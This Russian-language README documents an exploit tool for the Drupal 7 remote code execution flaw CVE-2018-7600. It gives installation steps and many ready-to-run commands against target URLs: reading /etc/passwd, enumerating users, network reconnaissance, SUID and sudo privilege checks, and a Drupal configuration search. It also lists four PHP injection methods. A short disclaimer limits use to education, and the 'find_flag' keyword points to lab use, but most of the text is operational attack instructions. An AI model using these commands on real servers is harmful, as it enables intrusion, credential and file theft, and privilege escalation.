
Python-эксплойт для CVE-2018-7600 (Drupalgeddon 2), обеспечивающий удалённое выполнение кода на Drupal 7 с несколькими методами инъекций и предопределёнными командами для Linux и Windows.
bixi.pybixi.py — эксплойт для уязвимости CVE‑2018‑7600 (Drupalgeddon 2), затрагивающей Drupal 7.
Позволяет удалённо выполнять команды (RCE) на уязвимых серверах Drupal через интуитивно понятный интерфейс с предопределёнными командами.
ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДНАЗНАЧЕНО ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И ИССЛЕДОВАТЕЛЬСКИХ ЦЕЛЕЙ В КОНТРОЛИРУЕМЫХ СРЕДАХ.
"С большой силой приходит большая ответственность"
system, passthru, exec, shell_exec)git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
cd Drupalgeddon2-CVE-2018-7600
# Kali / Debian / Ubuntu
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install requests
# Другие дистрибутивы
pip3 install requests
chmod +x bixi.py
python3 bixi.py --help
python3 bixi.py <URL> <КОМАНДА/КЛЮЧЕВОЕ_СЛОВО> [INJECTION_TYPE]
# Проверка уязвимости
python3 bixi.py http://10.99.99.6/drupal/ test
# Определение операционной системы
python3 bixi.py http://10.99.99.6/drupal/ linux
python3 bixi.py http://10.99.99.6/drupal/ windows
# Перечисление пользователей
python3 bixi.py http://10.99.99.6/drupal/ users_linux
python3 bixi.py http://10.99.99.6/drupal/ net_user
# Информация о системе
python3 bixi.py http://10.99.99.6/drupal/ ifconfig
python3 bixi.py http://10.99.99.6/drupal/ ipconfig
# Пользовательские команды
python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
| Команда | Описание |
|---|---|
| linux | Информация о системе |
| users_linux | Список пользователей |
| id | Информация о пользователе/группе |
| ls | Список файлов |
| ifconfig | Сетевая информация |
| find_flag | Поиск флагов |
| Команда | Описание |
|---|---|
| windows | Информация о системе |
| net_user | Список пользователей |
| whoami_win | Детальная информация |
| ipconfig | Сеть |
| netstat_win | Соединения |
| dir | Список каталога |
| Команда | Описание |
|---|---|
| sudo | Проверка привилегий sudo |
| suid | Поиск SUID-бинарников |
| net_localgroup | Локальные группы |
| drupal_config | Поиск конфигураций |
| drupal_version | Получение версии Drupal |
# system (по умолчанию)
python3 bixi.py http://target/ "whoami" system
# passthru
python3 bixi.py http://target/ "whoami" passthru
# exec
python3 bixi.py http://target/ "whoami" exec
# shell_exec
python3 bixi.py http://target/ "whoami" shell_exec
drupalgeddon2-exploit/
│
├── bixi.py
├── README.md
├── requirements.txt
├── examples/
│ ├── linux_commands.txt
│ └── windows_commands.txt
└── screenshots/
├── help_screen.png
└── exploit_success.png
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
Изменение значения по умолчанию (15 секунд):
timeout=15
Отредактируйте словарь commands в get_command_for_keyword()
pip3 install requests
# Проверка связности
ping TARGET_IP
# Проверка пути к Drupal
curl http://TARGET_IP/drupal/